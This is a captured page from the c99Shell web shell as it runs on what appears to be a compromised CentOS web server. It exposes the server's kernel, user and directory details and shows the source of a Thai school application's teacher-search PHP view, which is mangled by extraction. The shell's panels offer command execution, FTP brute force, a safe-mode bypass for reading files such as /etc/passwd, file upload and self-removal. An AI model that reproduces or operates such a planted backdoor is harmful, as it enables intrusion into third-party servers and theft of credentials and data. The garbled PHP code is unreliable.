!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/esa/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_popSearchTeacher2.php (1.84 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="JavaScript"><!--
function ReturnValue(psid,pscode,psname)
{
    window.opener.document.myform_search.elements["ps_id2"].value = psid;
    window.opener.document.myform_search.elements["ps_code2"].value = pscode;
    window.opener.document.myform_search.elements["adviser2"].value = psname;
    window.close();
}
//-->
</script>
<?php echo form_open("esa/search/get_ps_list", array("name" => "myform""id" => "myform"));?>
<table class='tb_1' border="0" width="100%" >
    <tr>
        <td colspan="2"><b>ชื่อ : <input type="text" name="name_search2" value="" size="10" maxlength="30" />
        ชื่อสกุล : <input type="text" name="lname_search2" value="" size="10" maxlength="30" />
        <input type="submit" name="search" value="ค้นหา">
        </td>
    </tr>
    <tr>
        <td>&nbsp;</td>
    </tr>
    <tr>
        <td colspan="2"><font size="1" color="#808080" > ** คลิ้กที่ชื่อ-สกุล เพื่อเพิ่มรายการ</td>
    </tr>
    <tr class='light'>
      <th align=center width="15%">ลำดับ</th> 
      <th align=center >ชื่อ - สกุล</th>
    </tr>


<?php
    
if(isset($ps)){
    
$seq 1;
    foreach (
$ps->result() as $row){
        if(
$seq%2==0)
            
$class 'light3';
        else
            
$class 'light2';
?>  
    <tr class=<?=$class?>>
        <td align="center"><?=$seq?></td>

        <td onClick="ReturnValue('<?=$row->personId?>','<?=$row->personCode?>','<?=$row->fName.'  '.$row->lName;?>')" onMouseOver="this.style.cursor='pointer'"><?php echo $row->fName.'  '.$row->lName?></td>
    </tr>
<?      $seq++; 
    }   }else{   
?>
    <tr >
      <td colspan="2" align="center" bgcolor="#D1DCF3">ไม่พบรายชื่ออาจารย์</td> 
    </tr>
<?  }   ?>
</table>
<?php echo form_close();?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0136 ]--